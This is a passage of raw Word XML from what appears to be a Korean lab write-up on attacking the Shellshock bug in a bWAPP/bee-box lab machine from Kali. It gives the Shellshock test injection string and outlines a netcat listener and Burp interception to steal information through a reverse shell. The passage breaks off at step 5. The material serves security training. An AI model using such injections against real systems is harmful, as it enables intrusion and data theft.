                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 192.168.0.90/24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="005BB5E9" w14:textId="31D0D3D1" w:rsidR="00C165CA" w:rsidRPr="00BE7966" w:rsidRDefault="00C165CA" w:rsidP="00C165CA">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:ind w:leftChars="0" w:left="360"/>
              <w:jc w:val="righ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대상 PC(b</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ee box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): </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>192.168.0.9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/2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C165CA" w:rsidRPr="00522648" w14:paraId="30F1EFFC" w14:textId="77777777" w:rsidTr="00C165CA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11F2F6C7" w14:textId="376F0777" w:rsidR="00C165CA" w:rsidRPr="00522648" w:rsidRDefault="005E590E" w:rsidP="00C165CA">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41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공격 수행</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C165CA" w:rsidRPr="00800586" w14:paraId="061E474E" w14:textId="77777777" w:rsidTr="00C165CA">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11CB0FD0" w14:textId="77777777" w:rsidR="00C165CA" w:rsidRDefault="00C165CA" w:rsidP="00C165CA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</w:p>
          <w:p w14:paraId="10A59ACA" w14:textId="77B65A23" w:rsidR="00945959" w:rsidRDefault="00945959" w:rsidP="00C165CA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  <w:proofErr w:type="spellStart"/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S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>hellShock</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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취약점을 가진 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>shell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을 사용하는지 확인하기 위하여 다음과 같은 간단한 명령어를 삽입해본다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="124055A7" w14:textId="72426D81" w:rsidR="00FF1F43" w:rsidRDefault="00FF1F43" w:rsidP="00C165CA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#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b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>dpkg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 -l </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>bash  /</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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/ 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b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ash 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버전을 확인하는 명령어</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4193684A" w14:textId="738470E7" w:rsidR="00945959" w:rsidRDefault="00945959" w:rsidP="00C165CA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#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 env var=</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>’(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>) { :;}; echo 1234’ bash -c “echo test”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3124E6E5" w14:textId="01A1209C" w:rsidR="00945959" w:rsidRDefault="00945959" w:rsidP="00C165CA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noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25F8B1EC" wp14:editId="736CE5C4">
                  <wp:extent cx="2517568" cy="1180392"/>
                  <wp:effectExtent l="0" t="0" r="0" b="127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439" cy="120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2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="004099FE" wp14:editId="33B7738F">
                  <wp:extent cx="2992137" cy="1169035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153" cy="1179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311AD" w14:textId="4DA4069C" w:rsidR="00945959" w:rsidRDefault="00945959" w:rsidP="00C165CA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업데이트가 되지 않은,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취약점을 갖는 쉘을 사용하는 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>beebox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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의 경우 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>1234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와 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>test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가 모두 출력되었다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D6359A5" w14:textId="1EEE7846" w:rsidR="00945959" w:rsidRDefault="00830836" w:rsidP="00C165CA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본래 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>env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명령어는</w:t>
            </w:r>
            <w:r w:rsidR="00B043EB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</w:t>
            </w:r>
            <w:r w:rsidR="00B043EB">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Bash</w:t>
            </w:r>
            <w:r w:rsidR="00B043EB">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>의 빌트인 명령어로,</w:t>
            </w:r>
            <w:r w:rsidR="00B043EB">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00B043EB">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>환경변수를 보여주거나 설정 혹은 삭제하는 명령어이다.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</w:t>
            </w:r>
            <w:r w:rsidR="00945959">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">env x=’() </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00945959">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>{ :;}</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00945959">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r w:rsidR="00945959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명령어는 함수를 이용한 환경변수 설정의 기본 형식이며 명령어 후 </w:t>
            </w:r>
            <w:r w:rsidR="00945959">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">‘;’ </w:t>
            </w:r>
            <w:r w:rsidR="00945959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뒤에 오는 명령어(상단의 경우 </w:t>
            </w:r>
            <w:r w:rsidR="00945959">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>echo 1234)</w:t>
            </w:r>
            <w:r w:rsidR="00945959">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>는 오류가 발생하거나 실행되지 않아야 한다.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 </w:t>
            </w:r>
            <w:r w:rsidR="00CF1982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하지만 취약점으로 인해 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00CF1982">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>beebox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00CF1982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쉘 에서는 </w:t>
            </w:r>
            <w:r w:rsidR="00CF1982">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>1234</w:t>
            </w:r>
            <w:r w:rsidR="00CF1982">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>가 출력되는 모습이다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17969DF9" w14:textId="11A60016" w:rsidR="00945959" w:rsidRDefault="00945959" w:rsidP="00C165CA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</w:p>
          <w:p w14:paraId="6965EF1E" w14:textId="28219748" w:rsidR="00CF1982" w:rsidRDefault="00CF1982" w:rsidP="00C165CA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이를 이용하여 e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cho 1234 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부분에 다른 명령어를 넣어 다음과 같이 정보를 탈취할 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A3F420A" w14:textId="1F49487B" w:rsidR="00CF1982" w:rsidRPr="00CF1982" w:rsidRDefault="00CF1982" w:rsidP="00C165CA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b/>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59FFDB8A" wp14:editId="1FD90965">
                  <wp:extent cx="5427024" cy="1028700"/>
                  <wp:effectExtent l="0" t="0" r="254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8968" cy="1029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A2DF64" w14:textId="7F0889FD" w:rsidR="00397660" w:rsidRDefault="00397660" w:rsidP="00C165CA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</w:p>
          <w:p w14:paraId="627070EC" w14:textId="0709A211" w:rsidR="00945959" w:rsidRDefault="00CF1982" w:rsidP="00C165CA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그러면 다음은 공격자의 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>pc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에서 원격으로 정보를 탈취해보도록 한다.</w:t>
            </w:r>
            <w:r w:rsidR="00694861">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidR="00694861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쉘 쇼크 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00694861">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>인젝션</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00694861">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74828355" w14:textId="77777777" w:rsidR="00CF1982" w:rsidRDefault="00CF1982" w:rsidP="00C165CA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</w:p>
          <w:p w14:paraId="19920CDC" w14:textId="5FCA0CC7" w:rsidR="00CF1982" w:rsidRPr="00CF1982" w:rsidRDefault="00CF1982" w:rsidP="00CF1982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(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1) </w:t>
            </w:r>
            <w:r w:rsidRPr="00CF1982">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>먼저 k</w:t>
            </w:r>
            <w:r w:rsidRPr="00CF1982">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ali</w:t>
            </w:r>
            <w:r w:rsidRPr="00CF1982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에서 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CF1982">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>웹브라우저를</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CF1982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이용하여 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CF1982">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>beebox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CF1982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사이트에 접속한다</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12E57579" w14:textId="68069CE0" w:rsidR="00CF1982" w:rsidRDefault="00CF1982" w:rsidP="00C165CA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[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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b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>eebox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>]/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>bWAPP</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B24675C" w14:textId="2757F1CE" w:rsidR="00CF1982" w:rsidRDefault="00CF1982" w:rsidP="00C165CA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</w:p>
          <w:p w14:paraId="337C6BDF" w14:textId="0A8F3201" w:rsidR="00CF1982" w:rsidRDefault="00CF1982" w:rsidP="00C165CA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noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43EBA4F1" wp14:editId="644A365D">
                  <wp:extent cx="5486400" cy="2268187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617" cy="2276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55A8B2" w14:textId="16181582" w:rsidR="00CF1982" w:rsidRDefault="00CF1982" w:rsidP="00C165CA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</w:p>
          <w:p w14:paraId="34FDD553" w14:textId="1D563D50" w:rsidR="00CF1982" w:rsidRDefault="00CF1982" w:rsidP="00C165CA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(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2) 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S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hellshock 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취약점을 선택한다.</w:t>
            </w:r>
            <w:r w:rsidR="00602A10">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00602A10">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>즉,</w:t>
            </w:r>
            <w:r w:rsidR="00602A10">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> Shellshock </w:t>
            </w:r>
            <w:r w:rsidR="00602A10">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>취약점이 있는 것으로 조사된 웹 페이지에 접속하는 것이다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="461BEAD0" w14:textId="23AE2887" w:rsidR="00CF1982" w:rsidRDefault="00CF1982" w:rsidP="00C165CA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noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29C03761" wp14:editId="0E14835A">
                  <wp:extent cx="5498275" cy="1552575"/>
                  <wp:effectExtent l="0" t="0" r="762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1006" cy="155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2144A5" w14:textId="204CB207" w:rsidR="00F02B2A" w:rsidRDefault="00F02B2A" w:rsidP="00C165CA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</w:p>
          <w:p w14:paraId="4506D85F" w14:textId="1C086302" w:rsidR="00F02B2A" w:rsidRDefault="00F02B2A" w:rsidP="00F02B2A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(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3) kali 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터미널에서 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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로 연결 세션을 기다린다.</w:t>
            </w:r>
            <w:r w:rsidR="00F331B0">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> Nc(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00F331B0">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00F331B0">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidR="00F331B0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은 </w:t>
            </w:r>
            <w:r w:rsidR="00602A10">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>네트워크 통신을 위한 프로그램으로,</w:t>
            </w:r>
            <w:r w:rsidR="00602A10">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F331B0">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>특정 포트를 열어 놓고,</w:t>
            </w:r>
            <w:r w:rsidR="00F331B0">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F331B0">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>외부에서 접근할 수 있도록 하거나 리버스 쉘로 상대방 쉘 권한을 찾아갈 수 있는 기능을 갖고</w:t>
            </w:r>
            <w:r w:rsidR="00602A10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</w:t>
            </w:r>
            <w:r w:rsidR="00F331B0">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50B6582C" w14:textId="78E5AFFB" w:rsidR="00F02B2A" w:rsidRPr="00F02B2A" w:rsidRDefault="00F02B2A" w:rsidP="00C165CA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</w:p>
          <w:p w14:paraId="2C4E3657" w14:textId="3FFCE154" w:rsidR="00CF1982" w:rsidRDefault="00F02B2A" w:rsidP="00C165CA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noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67F80793" wp14:editId="43FFC6F2">
                  <wp:extent cx="2434590" cy="546100"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="635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59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42ECC9" w14:textId="04346360" w:rsidR="00CF1982" w:rsidRDefault="00CF1982" w:rsidP="00C165CA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</w:p>
          <w:p w14:paraId="71DB2A6F" w14:textId="6AE6C2D4" w:rsidR="00F02B2A" w:rsidRDefault="00F02B2A" w:rsidP="00F02B2A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(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4) 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프록시 설정 후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>Burp Suite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를 이용하여 패킷 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>Intercept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를 활성화</w:t>
            </w:r>
            <w:r w:rsidR="00602A10">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>한다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.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C40ED44" w14:textId="1415D796" w:rsidR="00F02B2A" w:rsidRPr="00F02B2A" w:rsidRDefault="00F02B2A" w:rsidP="00C165CA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</w:p>
          <w:p w14:paraId="4887358D" w14:textId="1B747F38" w:rsidR="00CF1982" w:rsidRPr="00CF1982" w:rsidRDefault="00F331B0" w:rsidP="00C165CA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AE0533F" wp14:editId="4680150B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844550</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="775970" cy="206375"/>
                      <wp:effectExtent l="19050" t="19050" r="24130" b="22225"/>
                      <wp:wrapNone/>
                      <wp:docPr id="23" name="직사각형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97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4A959" id="직사각형 23" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:117.3pt;margin-top:66.5pt;width:61.1pt;height:16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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00F02B2A">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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553E472" wp14:editId="3AB42CC0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473835</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="3887470" cy="966470"/>
                      <wp:effectExtent l="19050" t="19050" r="17780" b="24130"/>
                      <wp:wrapNone/>
                      <wp:docPr id="24" name="직사각형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7470" cy="9664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5C732" id="직사각형 24" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:8.7pt;margin-top:116.05pt;width:306.1pt;height:76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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00CF1982">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="554E939A" wp14:editId="2D258EDA">
                  <wp:extent cx="5403272" cy="2671228"/>
                  <wp:effectExtent l="0" t="0" r="6985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82" cy="269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9E6B8A" w14:textId="0DF325A1" w:rsidR="00F02B2A" w:rsidRDefault="00F02B2A" w:rsidP="00C165CA">
      <w:pPr>
        <w:ind w:right="200"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FDB6E0A" w14:textId="583963B0" w:rsidR="00F02B2A" w:rsidRDefault="00F02B2A" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">5) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">웹 브라우저를 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>새로고침</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>한 뒤,</w:t>
      </w:r>
      <w:r>
